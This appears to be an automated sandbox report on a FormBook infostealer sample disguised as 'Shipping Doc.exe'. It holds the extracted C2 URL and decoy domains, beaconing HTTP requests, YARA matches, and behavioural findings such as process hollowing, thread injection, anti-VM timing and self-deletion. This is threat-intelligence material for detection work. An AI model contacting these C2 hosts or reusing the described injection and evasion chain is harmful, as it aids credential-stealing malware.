Windows Analysis Report Shipping Doc.exe

Overview

General Information

Sample Name: Shipping Doc.exe
Analysis ID: 458885
MD5: 159d560ff64cdb2d130b1635f4123a49
SHA1: 5762036dd01f8a63ce29557c5c0464360500c7e6
SHA256: 065252f5ed5475c89d2bff7389554a4695a85900a7a75eb98170c6a372b33ea0
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w10x64
  • Shipping Doc.exe (PID: 1932 cmdline: 'C:\Users\user\Desktop\Shipping Doc.exe' MD5: 159D560FF64CDB2D130B1635F4123A49)
    • Shipping Doc.exe (PID: 2148 cmdline: C:\Users\user\Desktop\Shipping Doc.exe MD5: 159D560FF64CDB2D130B1635F4123A49)
      • explorer.exe (PID: 3388 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cscript.exe (PID: 2000 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
          • cmd.exe (PID: 3984 cmdline: /c del 'C:\Users\user\Desktop\Shipping Doc.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.shopjempress.com/amb6/"], "decoy": ["segurocars.com", "rylautosales.com", "xinglinjiankang.com", "dantil-brand.com", "sofaloffa.club", "coinclub2.com", "ez-pens.com", "gqtlqsw.com", "robotnewswire.com", "ktproductreviews.com", "merchbrander.com", "yesonamendmentb.com", "losgatoslimos.com", "kristincole.art", "metalmaids.online", "leftcoastmodels.com", "athetheist.com", "jblbusrtingsale.com", "chungcugiarehcm.com", "renblockchain.com", "bigdaddy.fish", "comproliverton.pro", "gzmove.com", "honeythymeherbfarm.com", "davinescosmetics.com", "9355693.com", "movinmemphis901.com", "patriotsrs.net", "dagelijkseschoenen.com", "a-want-ad.site", "theodbox.com", "audioky.net", "hopematthewsrealtor.com", "theonlinemoneymachine.com", "misakiti.com", "ad-yalong.com", "mikealazo.com", "marianoterra.com", "shivorja.com", "goodvibrationswindchimes.com", "pecom-deliverry.online", "amlexcel.com", "emeralddrumcompany.com", "dalipaella.com", "shopcamacci.com", "xucaiwujin.com", "bxs5000.com", "2en1institut.com", "zxzm47-wj.com", "builttek.com", "66400yy.com", "beegraze.com", "thedottedcat.com", "komsah.com", "4202nsacramentoav.info", "88q27.com", "toriengenharia.com", "briscoewelding.com", "brookelenzi.com", "tribaltrash.com", "bidtas.com", "shokhorror.com", "bodurm.com", "333.wiki"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
13 further entries not shown.

Unpacked PEs

Source | Rule | Description | Author
4.2.Shipping Doc.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
4.2.Shipping Doc.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
4.2.Shipping Doc.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
4.2.Shipping Doc.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
4.2.Shipping Doc.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
1 further entry not shown.

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp, Malware Configuration Extractor: FormBook (same configuration as listed under Malware Configuration)
Multi AV Scanner detection for submitted file
Source: Shipping Doc.exe, Virustotal: Detection: 50%
Source: Shipping Doc.exe, Metadefender: Detection: 31%
Source: Shipping Doc.exe, ReversingLabs: Detection: 26%
Yara detected FormBook
Source: Yara match, File source: 4.2.Shipping Doc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.Shipping Doc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp, type: MEMORY
Machine Learning detection for sample
Source: Shipping Doc.exe, Joe Sandbox ML: detected
Source: 4.2.Shipping Doc.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: Shipping Doc.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: Shipping Doc.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: cscript.pdbUGP source: Shipping Doc.exe, 00000004.00000002.321211799.0000000003630000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000000.292742080.000000000EBC0000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: Shipping Doc.exe, 00000004.00000002.320512631.0000000001960000.00000040.00000001.sdmp, cscript.exe, 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: Shipping Doc.exe, 00000004.00000002.320512631.0000000001960000.00000040.00000001.sdmp, cscript.exe
Source: Binary string: cscript.pdb source: Shipping Doc.exe, 00000004.00000002.321211799.0000000003630000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000006.00000000.292742080.000000000EBC0000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\Shipping Doc.exe, Code function: 4x nop then pop esi, 4_2_00417164
Source: C:\Users\user\Desktop\Shipping Doc.exe, Code function: 4x nop then pop ebx, 4_2_00407AFB
Source: C:\Users\user\Desktop\Shipping Doc.exe, Code function: 4x nop then pop edi, 4_2_00416C9C
Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4x nop then pop ebx, 15_2_03207AFB
Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4x nop then pop esi, 15_2_03217164
Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4x nop then pop edi, 15_2_03216C9C

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.shopjempress.com/amb6/
Source: global traffic, HTTP traffic detected: GET /amb6/?DPt4=by49o9P4nbuTuOEn2y8q30QOI4mC2WgRQPsTiLFqW4T5eczeXRV1KBHGOAlC+0HR5lXX&l8B=RjAhR HTTP/1.1, Host: www.bigdaddy.fish, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: global traffic, HTTP traffic detected: GET /amb6/?DPt4=ZduBhxyNf/T8KdukIHnfIOdlFHQuF1EsUtpfZKs5gLBpa2z0TfcmffP3A+e7CMLv2uy0&l8B=RjAhR HTTP/1.1, Host: www.davinescosmetics.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: Joe Sandbox View, ASN Name: DREAMHOST-ASUS DREAMHOST-ASUS
Source: unknown, DNS traffic detected: queries for: www.bigdaddy.fish
Source: cscript.exe, 0000000F.00000002.483172630.0000000005E2F000.00000004.00000001.sdmp, String found in binary or memory: http://BigDaddyUnlimited.com/amb6/?DPt4=by49o9P4nbuTuOEn2y8q30QOI4mC2WgRQPsTiLFqW4T5eczeXRV1KBHGOAlC

E-Banking Fraud:

Yara detected FormBook
Source: Yara match, File source: 4.2.Shipping Doc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.Shipping Doc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 4.2.Shipping Doc.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.Shipping Doc.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 4.2.Shipping Doc.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.Shipping Doc.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\Shipping Doc.exe, Code function: 4_2_00419D60 NtCreateFile, 4_2_00419D60
Source: C:\Users\user\Desktop\Shipping Doc.exe, Code function: 4_2_00419E10 NtReadFile, 4_2_00419E10
Source: C:\Users\user\Desktop\Shipping Doc.exe, Code function: 4_2_00419E90 NtClose, 4_2_00419E90
Source: C:\Users\user\Desktop\Shipping Doc.exe, Code function: 4_2_00419F40 NtAllocateVirtualMemory, 4_2_00419F40
Source: C:\Users\user\Desktop\Shipping Doc.exe, Code function: 4_2_00419D5B NtCreateFile, 4_2_00419D5B
Source: C:\Users\user\Desktop\Shipping Doc.exe, Code function: 4_2_00419E8B NtClose, 4_2_00419E8B
Source: C:\Users\user\Desktop\Shipping Doc.exe, Code function: 4_2_00419F3A NtAllocateVirtualMemory, 4_2_00419F3A
Source: C:\Windows\SysWOW64\cscript.exe, Code function: 15_2_053D9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 15_2_053D9910
Source: C:\Windows\SysWOW64\cscript.exe, Code function: 15_2_053D9540 NtReadFile,LdrInitializeThunk, 15_2_053D9540
Source: C:\Windows\SysWOW64\cscript.exe, Code function: 15_2_053D99A0 NtCreateSection,LdrInitializeThunk, 15_2_053D99A0
Source: C:\Windows\SysWOW64\cscript.exe, Code function: 15_2_053D95D0 NtClose,LdrInitializeThunk, 15_2_053D95D0
Source: C:\Windows\SysWOW64\cscript.exe, Code function: 15_2_053D9860 NtQuerySystemInformation,LdrInitializeThunk, 15_2_053D9860
Source: C:\Windows\SysWOW64\cscript.exe, Code function: 15_2_053D9840 NtDelayExecution,LdrInitializeThunk, 15_2_053D9840
Source: C:\Windows\SysWOW64\cscript.exe, Code function: 15_2_053D9710 NtQueryInformationToken,LdrInitializeThunk, 15_2_053D9710
Source: C:\Windows\SysWOW64\cscript.exe, Code function: 15_2_053D9780 NtMapViewOfSection,LdrInitializeThunk, 15_2_053D9780
Source: C:\Windows\SysWOW64\cscript.exe, Code function: 15_2_053D9FE0 NtCreateMutant,LdrInitializeThunk, 15_2_053D9FE0
Source: C:\Windows\SysWOW64\cscript.exe, Code function: 15_2_053D9660 NtAllocateVirtualMemory,LdrInitializeThunk, 15_2_053D9660
Source: C:\Windows\SysWOW64\cscript.exe, Code function: 15_2_053D9650 NtQueryValueKey,LdrInitializeThunk, 15_2_053D9650
Source: C:\Windows\SysWOW64\cscript.exe, Code function: 15_2_053D9A50 NtCreateFile,LdrInitializeThunk, 15_2_053D9A50
Source: C:\Windows\SysWOW64\cscript.exe, Code function: 15_2_053D96E0 NtFreeVirtualMemory,LdrInitializeThunk, 15_2_053D96E0
Source: C:\Windows\SysWOW64\cscript.exe, Code function: 15_2_053D96D0 NtCreateKey,LdrInitializeThunk, 15_2_053D96D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053DAD30 NtSetContextThread,15_2_053DAD30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9520 NtWaitForSingleObject,15_2_053D9520
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9560 NtWriteFile,15_2_053D9560
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9950 NtQueueApcThread,15_2_053D9950
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D95F0 NtQueryInformationFile,15_2_053D95F0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D99D0 NtCreateProcessEx,15_2_053D99D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9820 NtEnumerateKey,15_2_053D9820
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053DB040 NtSuspendThread,15_2_053DB040
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D98A0 NtWriteVirtualMemory,15_2_053D98A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D98F0 NtReadVirtualMemory,15_2_053D98F0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9730 NtQueryVirtualMemory,15_2_053D9730
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053DA710 NtOpenProcessToken,15_2_053DA710
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9B00 NtSetValueKey,15_2_053D9B00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9770 NtSetInformationFile,15_2_053D9770
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053DA770 NtOpenThread,15_2_053DA770
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9760 NtOpenProcess,15_2_053D9760
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053DA3B0 NtGetContextThread,15_2_053DA3B0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D97A0 NtUnmapViewOfSection,15_2_053D97A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9A20 NtResumeThread,15_2_053D9A20
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9610 NtEnumerateValueKey,15_2_053D9610
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9A10 NtQuerySection,15_2_053D9A10
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9A00 NtProtectVirtualMemory,15_2_053D9A00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9670 NtQueryInformationProcess,15_2_053D9670
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9A80 NtOpenDirectoryObject,15_2_053D9A80
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_03219F40 NtAllocateVirtualMemory,15_2_03219F40
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_03219E10 NtReadFile,15_2_03219E10
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_03219E90 NtClose,15_2_03219E90
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_03219D60 NtCreateFile,15_2_03219D60
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_03219F3A NtAllocateVirtualMemory,15_2_03219F3A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_03219E8B NtClose,15_2_03219E8B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_03219D5B NtCreateFile,15_2_03219D5B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0539B150 appears 32 times
          Source: Shipping Doc.exe, 00000002.00000000.210709159.00000000004B0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameRemotingSurroga.exe> vs Shipping Doc.exe
          Source: Shipping Doc.exe, 00000004.00000002.320202534.0000000000F90000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameRemotingSurroga.exe> vs Shipping Doc.exe
          Source: Shipping Doc.exe, 00000004.00000002.321211799.0000000003630000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamecscript.exe` vs Shipping Doc.exe
          Source: Shipping Doc.exe, 00000004.00000002.320852896.0000000001C0F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Shipping Doc.exe
          Source: Shipping Doc.exeBinary or memory string: OriginalFilenameRemotingSurroga.exe> vs Shipping Doc.exe
          Source: Shipping Doc.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: 4.2.Shipping Doc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.Shipping Doc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.Shipping Doc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.Shipping Doc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@2/2
          Source: C:\Users\user\Desktop\Shipping Doc.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Shipping Doc.exe.log
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6040:120:WilError_01
          Source: Shipping Doc.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Shipping Doc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\Shipping Doc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: Shipping Doc.exeVirustotal: Detection: 50%
          Source: Shipping Doc.exeMetadefender: Detection: 31%
          Source: Shipping Doc.exeReversingLabs: Detection: 26%
          Source: unknownProcess created: C:\Users\user\Desktop\Shipping Doc.exe 'C:\Users\user\Desktop\Shipping Doc.exe'
          Source: C:\Users\user\Desktop\Shipping Doc.exeProcess created: C:\Users\user\Desktop\Shipping Doc.exe C:\Users\user\Desktop\Shipping Doc.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Shipping Doc.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Shipping Doc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Shipping Doc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Shipping Doc.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cscript.pdbUGP source: Shipping Doc.exe, 00000004.00000002.321211799.0000000003630000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000000.292742080.000000000EBC0000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Shipping Doc.exe, 00000004.00000002.320512631.0000000001960000.00000040.00000001.sdmp, cscript.exe, 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Shipping Doc.exe, 00000004.00000002.320512631.0000000001960000.00000040.00000001.sdmp, cscript.exe
          Source: Binary string: cscript.pdb source: Shipping Doc.exe, 00000004.00000002.321211799.0000000003630000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000006.00000000.292742080.000000000EBC0000.00000002.00000001.sdmp
          Source: Shipping Doc.exeStatic PE information: 0xAAC44811 [Thu Oct 14 14:37:05 2060 UTC]
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_00414A19 push ebp; ret 4_2_00414A1C
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_004046A7 push edx; ret 4_2_004046AC
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_0041CEB5 push eax; ret 4_2_0041CF08
